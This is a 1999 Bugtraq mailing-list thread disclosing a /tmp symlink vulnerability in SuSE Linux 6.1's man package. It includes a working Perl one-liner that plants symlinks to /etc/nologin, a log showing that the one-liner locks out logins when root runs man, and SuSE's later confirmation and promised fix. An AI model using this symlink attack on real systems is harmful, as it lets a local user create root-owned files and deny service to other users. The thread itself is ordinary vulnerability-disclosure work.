Date: Wed, 2 Jun 1999 11:01:32 +0200
From: Thomas Fischbacher <Thomas.Fischbacher@PHYSIK.UNI-MUENCHEN.DE>
To: BUGTRAQ@netspace.org
Subject: /tmp symlink problems in SuSE Linux 6.1
I notified SuSE GmbH several weeks ago about this problem, but didn't get
any response, therefore this post to Bugtraq.
With SuSE Linux 6.1 there are still a few programs around which blindly
create files in /tmp regardless of whether a symlink or something
similarly evil already exists in that place. Among these programs are
'man'and 'dvips'.
Though it seems to be impossible by now to overwrite /etc/passwd with a
plain simple /tmp/zman01234aaa symlink (didn't check if the source is
race-condition free, though), one can still create arbitrary
files which do funny things. Example:
perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
--
regards, tf@cip.physik.uni-muenchen.de (o_
Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))
-------------------------------------------------------------------------------
Date: Fri, 4 Jun 1999 09:52:36 +0200
From: Thomas Biege <thomas@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1
Hi,
we at SuSE could not reproduce this problem neither for
man nor for dvips.
Please send us a full list of "maybe" buggy tools, so we
could evaluate them.
Bye,
Thomas
PS: I never saw your email at your mailinglists.
--
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: thomas@suse.de Function: Security Support & Auditing
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82
-------------------------------------------------------------------------------
Date: Fri, 4 Jun 1999 16:36:46 +0200
From: Thomas Fischbacher <Thomas.Fischbacher@PHYSIK.UNI-MUENCHEN.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1
> Hi,
> we at SuSE could not reproduce this problem neither for
> man nor for dvips.
Ok, here is a log of what I just did five minutes ago:
(emacs -- M-x shell, btw.)
brauneck:~ # whoami
root
brauneck:~ # cd /tmp
brauneck:/tmp # cat /etc/SuSE-release
SuSE Linux 6.1 (i386)
VERSION = 6.1
brauneck:/tmp # rpm -q man
man-2.3.10-62
brauneck:/tmp # md5sum /usr/bin/man
b383967ce695352002f077680e375c62 /usr/bin/man
brauneck:/tmp # su tf
tf@brauneck:/tmp > export LS_OPTIONS=''
tf@brauneck:/tmp > export LS_COLORS=''
tf@brauneck:/tmp > ls zman*
ls: zman*: No such file or directory
tf@brauneck:/tmp > /bin/bash -c "echo $$"
6056
tf@brauneck:/tmp > # this gives me a current pid range
tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
tf@brauneck:/tmp > ls -l /tmp/zman06123aaa
lrwxrwxrwx 1 tf stud 12 Jun 4 16:28 /tmp/zman06123aaa -> /etc/nologin
tf@brauneck:/tmp > ls -l /etc/nologin
ls: /etc/nologin: No such file or directory
tf@brauneck:/tmp > exit
brauneck:/tmp # man mmap
Reformatting mmap(2), please wait...
WARNING: terminal is not fully functional
MMAP(2) Linux Programmer's Manual MMAP(2)
NAME
mmap, munmap - map or unmap files or devices into memory
SYNOPSIS
#include <unistd.h>
#include <sys/mman.h>
#ifdef _POSIX_MAPPED_FILES
void * mmap(void *start, size_t length, int prot , int
flags, int fd, off_t offset);
int munmap(void *start, size_t length);
#endif
DESCRIPTION
brauneck:/tmp # ls -la /etc/nologin
-rw-r--r-- 1 root root 4319 Jun 4 16:30 /etc/nologin
brauneck:/tmp # ls /tmp/zman0* | wc -l
999
brauneck:/tmp # # Note that one link was removed!
brauneck:/tmp #
You see -- the problem definitely is not fiction! Come over to Munich and
see yourself if you want.
> Please send us a full list of "maybe" buggy tools, so we
> could evaluate them.
?
> PS: I never saw your email at your mailinglists.
?
--
regards, tf@cip.physik.uni-muenchen.de (o_
Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))
-------------------------------------------------------------------------------
Date: Sat, 5 Jun 1999 07:13:28 +0200
From: Thomas Biege <thomas@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1
On Fri, 4 Jun 1999, Thomas Fischbacher wrote:
> > we at SuSE could not reproduce this problem neither for
> > man nor for dvips.
>
> Ok, here is a log of what I just did five minutes ago:
> (emacs -- M-x shell, btw.)
[...]
> You see -- the problem definitely is not fiction! Come over to Munich and
> see yourself if you want.
I don't think it's a fiction...
... the fact is, that just old releases of SuSE 6.1 seem to be
vulnerable, the newer releases didn't - man uses open(O_EXCL) and
drops it's privileges.
A customer told me, that the behavior you described just happens
when he opens a big man page for the first time... we will check
this as soon as posible.
> > Please send us a full list of "maybe" buggy tools, so we
> > could evaluate them.
> ?
In your first post to bugtraq you mentioned, that more tools have
/tmp symlink problems... feel free to tell us about them.
(BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.)
Bye,
Thomas
--
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: thomas@suse.de Function: Security Support & Auditing
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82
-------------------------------------------------------------------------------
Date: Sat, 5 Jun 1999 22:02:19 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1
Hi,
we confirmed the link vulnerablity in the man package.
The culprit is zsoelim which creates the file without looking left and
right. :-(
All linux distributions using man 2.3.10 should be affected.
A fixed package from us will be available soon.
Greets,
Marc
--
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: marc@suse.de Function: Security Support & Auditing
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C